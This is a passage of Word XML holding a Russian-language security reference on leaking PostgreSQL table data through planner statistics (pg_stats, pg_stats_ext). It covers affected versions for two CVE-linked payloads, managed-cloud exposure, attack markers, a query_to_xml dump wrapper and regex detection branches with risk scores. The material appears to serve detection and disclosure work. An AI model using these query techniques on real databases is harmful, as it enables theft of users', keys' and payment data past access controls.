        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PUBLIC на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> views. Payload B обходит ACL колонок. Payload C обходит view-ACL и RLS. См. таблицу в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.0</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0756FE20" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Конфиги GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не влияют. ANALYZE и autovacuum-расписание влияют только на свежесть статистики.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5FC8D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A901A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> читают: pganalyze / pgwatch / pgmustard и аналогичные инструменты query-планнинга/оптимизации — регулярные запросы каждые 1-5 минут от выделенной monitoring-роли. Атака — единичный запрос от application-роли, особенно с конкретным WHERE по чувствительной таблице (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tablename = 'users'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'api_keys'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'payments'</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B12ED2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   DBA при ручной оптимизации запросов смотрит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для конкретной колонки — это разовые ad-hoc запросы из psql, не из application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665E0F3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — почти не используется в legitimate коде; CREATE STATISTICS делает DBA при тюнинге, чтение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — почти всегда либо monitoring-роль, либо атака.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417BBF60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Маркер атаки в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT $1, attname, most_common_vals::text FROM pg_stats WHERE ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от application-роли — характерный отпечаток. От monitoring-роли — норма; от application — атака.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43699766" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Custom operator из application-роли (Payload C) — однозначная атака. Application-код не создаёт операторов и не использует exotic-операторы в WHERE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E1EF82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_user_functions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (если включён) покажет высокую </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>total_time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для custom selectivity-функций — индикатор Payload C-стиля эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAE24B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C28BAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload A:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все поддерживаемые PG (12–17).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4374F224" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload B (R17 CVE-2024-4317):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает на 14.0–14.11, 15.0–15.6, 16.0–16.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>И на «патченных» кластерах</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, если не выполнен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fix-CVE-2024-4317.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в каждой БД (включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>template0</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>template1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — иначе новые БД создаются с уязвимым view-определением).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787A32CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload C (R26 CVE-2025-8713):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает на 13.0–13.21, 14.0–14.18, 15.0–15.13, 16.0–16.9, 17.0–17.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FBFFFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1897C61B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R17 на managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AWS RDS / Cloud SQL / Supabase — патч бинаря применяется автоматически (provider-managed minor upgrades), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fix-CVE-2024-4317.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исторически </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не выполнялся автоматически</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ни одним из major-провайдеров. Это значит: на managed-PG, апгрейднутом с уязвимой версии, дыра может оставаться открытой даже на актуальном minor — нужна явная проверка через попытку Payload B. (Provider-side advisory от RDS и Cloud SQL рекомендовал ручной запуск скрипта; не все клиенты это сделали.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1197BAB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R26 на managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> фикс через бинарь, применяется provider-side при minor upgrade. На managed обычно патч-окно = недели после release, инстансы на стороне клиента остаются уязвимыми, пока maintenance window не наступит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E23B0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Детально по провайдерам — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Полные advisory-блоки и хронология — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 (R17, 2024)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 (R26, 2025)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760002EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797CB6C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Optimizer stats обходят ACL и RLS. 3.17.4 разбирает тот же класс CVE (R26) с точки зрения RLS-моделирования: какие политики обходятся через optimizer, как защититься. 3.8.6 — про утечку данных через статистику в принципе; 3.17.4 — про RLS-aspect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407BEBBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid.rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Payload B) после получения superuser — то же про утечку чувствительных данных, но через прямое чтение каталога, не через статистику.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0FCBEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml('SELECT most_common_vals FROM pg_stats WHERE ...', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обёртка для компактного дампа всей статистики БД одной командой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120F8FF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — после успешной эскалации до superuser весь канал 3.8.6 становится нерелевантным (можно читать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую). 3.8.6 — техника </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> эскалации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A124E7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 (2024)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — полный CVE-2024-4317 advisory, хронология фикса, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fix-CVE-2024-4317.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> детали.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5A2339" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 (2025)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — полный CVE-2025-8713 advisory, цепочки эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C060777"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pg_stats</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>most_common_vals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>METADATA_RECON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.8.1) добавить ветку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats|pg_stats_ext|pg_statistic|pg_statistic_ext|most_common_vals|histogram_bounds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>risk_score = 8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Дополнительно — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE\s+OPERATOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в любом запросе от не-DBA роли = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>risk_score = 9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (отдельная regex-ветка как маркер Payload C). Сводный regex для всей категории 3.8 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.8.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E593E31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B3AF19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Views — pg_stats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — R17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18512EFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Views — pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — R17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D84A91A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Catalog — pg_statistic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65583AB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL advisory CVE-2024-4317</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — R17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D04FAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>pganalyze: 5min Postgres — CVE-2024-4317 system views</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — R17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D5C3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL advisory CVE-2025-8713</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — R26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3818796F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>GBHackers: critical PostgreSQL flaws (Aug 2025)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — R26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF77908" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Statistics Used by the Planner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EAFC5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари категории 3.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DFD760" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
